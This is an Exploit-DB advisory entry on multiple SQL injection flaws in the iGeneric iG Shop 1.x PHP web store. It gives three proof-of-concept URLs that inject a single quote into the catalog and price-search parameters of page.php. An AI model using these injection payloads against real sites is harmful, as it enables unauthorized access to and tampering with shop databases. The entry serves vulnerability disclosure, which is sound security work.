iGeneric iG Shop 1.x - Multiple SQL Injection Vulnerabilities

2005-02-22T00:00:00
ID EDB-ID:25149
Type exploitdb
Reporter John Cobb
Modified 2005-02-22T00:00:00

Description

iGeneric iG Shop 1.x Multiple SQL Injection Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12627/info

iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

It is conjectured that all releases of iG Shop are affected by these vulnerabilities; this has not been confirmed. 

The following proof of concepts are available:
http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search

http://www.example.com/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search